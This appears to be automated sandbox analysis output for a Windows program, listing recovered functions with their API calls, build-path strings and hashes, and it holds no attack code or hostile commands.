                                                                                                • Opcode Fuzzy Hash: c086a5155bcd9adcb998fee45ac4c1b721df93561d1b6cf05d8a3f5be157aa97
                                                                                                • Instruction Fuzzy Hash: B4F062307813206BF6306B255D07F776258BB50F01F15442EBE55EE2C6EBF9E910868D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetProcessHeap.KERNEL32(00000000,000000FF,000000FF,00000000,?,00484664,00000008,00000000,?,74E070F0,00484554,004844FC,00000000,?,00000000,00000000), ref: 00476076
                                                                                                • HeapAlloc.KERNEL32(00000000,?,004844FC,00000000,?,?), ref: 0047607D
                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,004844FC,00000000,?,?), ref: 004760A7
                                                                                                • HeapFree.KERNEL32(00000000,?,004844FC,00000000,?,?), ref: 004760AE
                                                                                                • GetLastError.KERNEL32(?,004844FC,00000000,?,?), ref: 004760B8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Heap$Process$AllocErrorFreeLast
                                                                                                • String ID: Ot Ut$@fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\alloc.cpp
                                                                                                • API String ID: 3300557996-2997601972
                                                                                                • Opcode ID: 6b42845ae8b96d30d99fde117a550c9ed30057622128f8bcd34f7d1c2756b4af
                                                                                                • Instruction ID: 99fdc72a95274129d761b5f0c6e26898d5e3842ddd9422877772a80e6ca44027
                                                                                                • Opcode Fuzzy Hash: 6b42845ae8b96d30d99fde117a550c9ed30057622128f8bcd34f7d1c2756b4af
                                                                                                • Instruction Fuzzy Hash: C701D4762007016BE3206BAA9C49F77776CEF84741F11842EBA59C3262D674D810C679
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,004F35E0), ref: 004CF2F3
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00533D8C,000000FF,00000000,0000003F,00000000,?,?), ref: 004CF36B
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00533DE0,000000FF,?,0000003F,00000000,?), ref: 004CF398
                                                                                                • _free.LIBCMT ref: 004CF2E1
                                                                                                  • Part of subcall function 004CB2DE: HeapFree.KERNEL32(00000000,00000000,?,004D0047,?,00000000,?,00000000,?,004D02EB,?,00000007,?,?,004D082C,?), ref: 004CB2F4
                                                                                                  • Part of subcall function 004CB2DE: GetLastError.KERNEL32(?,?,004D0047,?,00000000,?,00000000,?,004D02EB,?,00000007,?,?,004D082C,?,?), ref: 004CB306
                                                                                                • _free.LIBCMT ref: 004CF4AD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                • String ID: 5O
                                                                                                • API String ID: 1286116820-2690845227
                                                                                                • Opcode ID: ee13a21d9ca63f449b09b62bd8cccac51d793427e9c94f6d2a9e0c2772963069
                                                                                                • Instruction ID: 5746a23e988e9a21be99a240f49f1a17f727f2598325a87ed9d99a77f8fc2b21
                                                                                                • Opcode Fuzzy Hash: ee13a21d9ca63f449b09b62bd8cccac51d793427e9c94f6d2a9e0c2772963069
                                                                                                • Instruction Fuzzy Hash: 7451E979900209AFCB50EF669C41EAE7BB9EF54760B10057FE410D72A1D73C9E099758
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 004804A3
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004805E5
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 00480601
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment
                                                                                                • String ID: xMS$xMS$xMS
                                                                                                • API String ID: 2574743344-2738134327
                                                                                                • Opcode ID: 516de21c462bb290c014cbd73626bc160920ebe2bb0666436ecde0f640c70e65
                                                                                                • Instruction ID: e7d85a417b5d657f65dc28ce800c3cac6bb96a226664814293b7bdd33bb3b617
                                                                                                • Opcode Fuzzy Hash: 516de21c462bb290c014cbd73626bc160920ebe2bb0666436ecde0f640c70e65
                                                                                                • Instruction Fuzzy Hash: FA51D771911305EACB50EFA4C801BAFB7B4AF14714F14885AE855A3382E778DA48CBA9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 37dc1e1a7a48b1db10d521418c3abf32cd8d8192af681bc0aea0ae6af0d96106
                                                                                                • Instruction ID: bac56698847ec4a79603fd7f3c147d4f13f2f6b14d52d521385992ce310b489b
                                                                                                • Opcode Fuzzy Hash: 37dc1e1a7a48b1db10d521418c3abf32cd8d8192af681bc0aea0ae6af0d96106
                                                                                                • Instruction Fuzzy Hash: 9B51E43590020AEBCF14EFA8CC54BAEBBB9FF44700F54456AE905A7391D7789E00CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 004395E0: CreatePen.GDI32(?,?,?), ref: 004395F0
                                                                                                  • Part of subcall function 004395E0: GetLastError.KERNEL32(?,?,0044EE9B,00000000,?,?,?,?,00000000), ref: 004395FC
                                                                                                • SelectObject.GDI32(?,00000000), ref: 0045C447
                                                                                                • GetStockObject.GDI32(00000005), ref: 0045C458
                                                                                                • SelectObject.GDI32(004560C5,00000000), ref: 0045C466
                                                                                                • Rectangle.GDI32(004560C5,?,?,?,?), ref: 0045C484
                                                                                                • SelectObject.GDI32(004560C5,00000000), ref: 0045C4C1
                                                                                                • SelectObject.GDI32(004560C5,00000000), ref: 0045C4C9
                                                                                                • DeleteObject.GDI32(00000000), ref: 0045C4DA
                                                                                                  • Part of subcall function 0044B8D0: GradientFill.MSIMG32 ref: 0044B986
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Object$Select$CreateDeleteErrorFillGradientLastRectangleStock
                                                                                                • String ID:
                                                                                                • API String ID: 2387617135-0
                                                                                                • Opcode ID: 746739d411f94bd69bc44235ef01e67997a0fbcbe90882dbfb914dd89347d746
                                                                                                • Instruction ID: e9b22274b73b1fcccb3c6a1cb3e30e69530465da15396ebf9772ade5bdb8cb16
                                                                                                • Opcode Fuzzy Hash: 746739d411f94bd69bc44235ef01e67997a0fbcbe90882dbfb914dd89347d746
                                                                                                • Instruction Fuzzy Hash: 20515771D0024CEFCF01CF98DD81AEEBBB9FB48314F10816AE904A3251E7766A54CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00499125
                                                                                                • InterlockedIncrement.KERNEL32(00000005), ref: 004991A5
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 004991CF
                                                                                                • LeaveCriticalSection.KERNEL32(?,?,00000000,?,?), ref: 00499252
                                                                                                Strings
                                                                                                • @fO, xrefs: 00499182
                                                                                                • d:\build.agent\teamagent\_work\1\s\build\0\fineobjects\inc\map.h, xrefs: 00499178
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalIncrementInterlockedSection$EnterLeave
                                                                                                • String ID: @fO$d:\build.agent\teamagent\_work\1\s\build\0\fineobjects\inc\map.h
                                                                                                • API String ID: 2727847847-1291485746
                                                                                                • Opcode ID: 76977697e95abec7be63b57fda85178919e462b4b4dd368094b7a58dc2a49edc
                                                                                                • Instruction ID: b8042dba97b8da18e239bf6ec00b911149b78d48e71a1db8261f877e694b84df
                                                                                                • Opcode Fuzzy Hash: 76977697e95abec7be63b57fda85178919e462b4b4dd368094b7a58dc2a49edc
                                                                                                • Instruction Fuzzy Hash: 2D415F7590020AAFDB14CF99C849BAEBBB8BF44714F14856EEC25A7381D778DE00CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0048E0E5
                                                                                                • InterlockedDecrement.KERNEL32(74E070F0), ref: 0048E101
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 0048E128
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: DecrementInterlocked
                                                                                                • String ID: xMS$xMS$xMS
                                                                                                • API String ID: 3448037634-2738134327
                                                                                                • Opcode ID: ba54310e56c56f9a93aaba8835d8a8962b2e3986face973d67da192627435e2d
                                                                                                • Instruction ID: b6a5a601153fa80172cd2580f749ea058e70069845315e39d245cfab687e5ab8
                                                                                                • Opcode Fuzzy Hash: ba54310e56c56f9a93aaba8835d8a8962b2e3986face973d67da192627435e2d
                                                                                                • Instruction Fuzzy Hash: 4E4104326005489FCB15EF5AC884BBEB7A5FB45715F004A6EEC5597391C738AD01CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004202F1
                                                                                                • InterlockedIncrement.KERNEL32(-00000008), ref: 00420373
                                                                                                • InterlockedDecrement.KERNEL32(00000008), ref: 00420392
                                                                                                • InterlockedDecrement.KERNEL32(00000008), ref: 004203C9
                                                                                                Strings
                                                                                                • @fO, xrefs: 0042031B
                                                                                                • D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Object.h, xrefs: 00420311
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment
                                                                                                • String ID: @fO$D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Object.h
                                                                                                • API String ID: 2574743344-2929781898
                                                                                                • Opcode ID: 20ac53f8355f95984add76ad787b2296eaf164fbb9087805fa5462e6ed5b7a32
                                                                                                • Instruction ID: 9ec2c685d3aa7a30383c32d21b08e396148a1de6f9791095bf75940b2ef8724a
                                                                                                • Opcode Fuzzy Hash: 20ac53f8355f95984add76ad787b2296eaf164fbb9087805fa5462e6ed5b7a32
                                                                                                • Instruction Fuzzy Hash: 8D417B76A01621ABCB20CF58D944B6ABBE4FF04714F05861AAD09AB342D775EC01CBD4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetDlgItem.USER32 ref: 00434509
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                  • Part of subcall function 004361B0: IsWindow.USER32(?), ref: 004361D7
                                                                                                  • Part of subcall function 004361B0: IsWindow.USER32(?), ref: 0043620D
                                                                                                  • Part of subcall function 004361B0: GetWindowLongW.USER32(?,000000F0), ref: 00436239
                                                                                                  • Part of subcall function 004361B0: GetMenu.USER32(?), ref: 00436249
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window$CriticalSectionValue$EnterException@8ItemLeaveLongMenuThrow
                                                                                                • String ID: @fO$@fO$d:\build\teamagent\_work\1\s\0\awl\src\windowawl.cpp$d:\build\teamagent\_work\1\s\0\awl\src\winmapawl.cpp$hYS
                                                                                                • API String ID: 715737024-3994018748
                                                                                                • Opcode ID: c4756fb1cbdfee490b237f7ffda6a0e8ae64174ddfa3de8c6c0527803e8bc138
                                                                                                • Instruction ID: c5d763b5a45eec63e8fc8841e9f068992c652cfc2f59d79fe19b551f5d72c4fb
                                                                                                • Opcode Fuzzy Hash: c4756fb1cbdfee490b237f7ffda6a0e8ae64174ddfa3de8c6c0527803e8bc138
                                                                                                • Instruction Fuzzy Hash: CE41EF70A00705EBDB209B65DC46B6A77B5BB98714F04A12BF601873A1EB7DE904DB48
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID: $ $@fO$@fO$d:\build\teamagent\_work\1\s\0\awl\src\toolbarawl.cpp
                                                                                                • API String ID: 3850602802-3946577421
                                                                                                • Opcode ID: d4e4255efca6d3ae15570e1b929a689fb0151179e4efa10a74fcdaf608b05afd
                                                                                                • Instruction ID: fd5c0a0c0944f778ca1863a266f106ab1c37ce1a10c4bca6a4bbdbd0c716e1ad
                                                                                                • Opcode Fuzzy Hash: d4e4255efca6d3ae15570e1b929a689fb0151179e4efa10a74fcdaf608b05afd
                                                                                                • Instruction Fuzzy Hash: 3D41C030608701AFD728CF28C455BABBBE1FF84314F04861EF999973A1D735A955CB86
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0045A3B1
                                                                                                  • Part of subcall function 004742B0: GetVersionExW.KERNEL32(00534020,00000000,?,0000000A,00415A52), ref: 004742CF
                                                                                                  • Part of subcall function 004742B0: InterlockedExchange.KERNEL32(0053401C,00000001), ref: 004742FF
                                                                                                  • Part of subcall function 004305A0: InterlockedIncrement.KERNEL32(?), ref: 00430664
                                                                                                  • Part of subcall function 004305A0: InterlockedDecrement.KERNEL32(?), ref: 00430726
                                                                                                  • Part of subcall function 004BA219: __onexit.LIBCMT ref: 004BA21F
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0045A469
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0045A4CE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$CursorExchangeIncrementLoadVersion__onexit
                                                                                                • String ID: COMBOBOX$xMS$xMS
                                                                                                • API String ID: 657574442-2563591125
                                                                                                • Opcode ID: 2b296ce5ebba4bfa9dbb78d91438e4dfcd30501494bee2aafd527a25211bab85
                                                                                                • Instruction ID: 49cb6378186921c015cf759b7b77f8d9c5150530aea6251d1c6bbb63c42129df
                                                                                                • Opcode Fuzzy Hash: 2b296ce5ebba4bfa9dbb78d91438e4dfcd30501494bee2aafd527a25211bab85
                                                                                                • Instruction Fuzzy Hash: 29411730600604AFDB24DF55DD16BAAB7A5FB41711F00832EF815572C2DBB86E54CB9A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 004992AB
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 00499323
                                                                                                • LeaveCriticalSection.KERNEL32(?,?), ref: 0049933B
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0049938D
                                                                                                Strings
                                                                                                • @fO, xrefs: 0049935A
                                                                                                • d:\build.agent\teamagent\_work\1\s\build\0\fineobjects\inc\object.h, xrefs: 00499350
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$Leave$EnterIncrementInterlocked
                                                                                                • String ID: @fO$d:\build.agent\teamagent\_work\1\s\build\0\fineobjects\inc\object.h
                                                                                                • API String ID: 3182790584-3192388581
                                                                                                • Opcode ID: 66c76dc1044f90af7956a66935ec2c3c9c8006704472d61370e649c8faf96526
                                                                                                • Instruction ID: 981c52b6f1de654a813441fe5d1cdf07c3d7f11496e73a701bed7bc22fb187f7
                                                                                                • Opcode Fuzzy Hash: 66c76dc1044f90af7956a66935ec2c3c9c8006704472d61370e649c8faf96526
                                                                                                • Instruction Fuzzy Hash: 3131AE71600254EBCB20DF68D905BAFBBA5FB69714F04496EEC4297381D379AD00CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00435CD0: IsWindow.USER32(?), ref: 00435CF8
                                                                                                  • Part of subcall function 00435CD0: GetWindow.USER32(?,?), ref: 00435D28
                                                                                                • IsWindow.USER32(?), ref: 0045D029
                                                                                                • SendMessageW.USER32(?,00000418,00000000,00000000), ref: 0045D05F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window$MessageSend
                                                                                                • String ID: $@$@fO$d:\build\teamagent\_work\1\s\0\awl\inc\toolbarctrlawl.h
                                                                                                • API String ID: 1496643700-981237200
                                                                                                • Opcode ID: fd42ada578738aa56410223676fb15e89abba05524a520e9657a83b2f96014b3
                                                                                                • Instruction ID: 814c274f22ae850fce775871e960df63a0ec83c84e0ae7477aa4f3f48a386806
                                                                                                • Opcode Fuzzy Hash: fd42ada578738aa56410223676fb15e89abba05524a520e9657a83b2f96014b3
                                                                                                • Instruction Fuzzy Hash: 76310A706043406BE724AF258C46B6FB7E9AF84749F00051EFD8497281EB75D9058A9A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0048D550: InterlockedDecrement.KERNEL32(00000000), ref: 0048D596
                                                                                                  • Part of subcall function 0048D550: InterlockedDecrement.KERNEL32(?), ref: 0048D621
                                                                                                  • Part of subcall function 00478640: InterlockedIncrement.KERNEL32(00530380), ref: 00478677
                                                                                                  • Part of subcall function 0048D750: InterlockedDecrement.KERNEL32(00000000), ref: 0048D7D2
                                                                                                • InterlockedDecrement.KERNEL32(000000FF), ref: 0048D475
                                                                                                • InterlockedDecrement.KERNEL32(0048D984), ref: 0048D4DD
                                                                                                • InterlockedDecrement.KERNEL32(0048D984), ref: 0048D50C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment
                                                                                                • String ID: xMS$xMS$xMS
                                                                                                • API String ID: 2574743344-2738134327
                                                                                                • Opcode ID: a95f55e8bc66225039f3408da082ae9abf8140ecf1328dc3a97deeeb0ea72b40
                                                                                                • Instruction ID: 8638838ae97c0d5d3d107885865e91b6b181c8d0a8b5881d5467f772d1dec8ca
                                                                                                • Opcode Fuzzy Hash: a95f55e8bc66225039f3408da082ae9abf8140ecf1328dc3a97deeeb0ea72b40
                                                                                                • Instruction Fuzzy Hash: 4F31A035601A00AFC710EF59C840BAEBBB5FF49720F00866EE91597391D739AE01CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(?), ref: 004504F2
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00450531
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00450555
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: DecrementInterlocked$Window
                                                                                                • String ID: @fO$xMS$xMS
                                                                                                • API String ID: 299001406-3436477996
                                                                                                • Opcode ID: 517dd4b52123ff8b9d2cfa98ccd84117bad93af84c30c79c671dbac46942f7d0
                                                                                                • Instruction ID: 1aac72c6bc45603141752b81d81f659e15c048f7faf122a7dda399e3df776cb8
                                                                                                • Opcode Fuzzy Hash: 517dd4b52123ff8b9d2cfa98ccd84117bad93af84c30c79c671dbac46942f7d0
                                                                                                • Instruction Fuzzy Hash: 62312475500648AFDB11DF68C800BEF7BA9EF40311F14861EEC556B382D779AE05CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(00535A5C,?), ref: 00435151
                                                                                                • EnterCriticalSection.KERNEL32(00535A5C), ref: 0043516C
                                                                                                • LeaveCriticalSection.KERNEL32(00535A5C,?), ref: 004351A0
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                • LeaveCriticalSection.KERNEL32(00535A5C,?,?,?,?,?), ref: 004351F2
                                                                                                • LeaveCriticalSection.KERNEL32(00535A5C,?), ref: 00435215
                                                                                                Strings
                                                                                                • @fO, xrefs: 004351B8
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\inc\handlemapawl.h, xrefs: 004351AE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
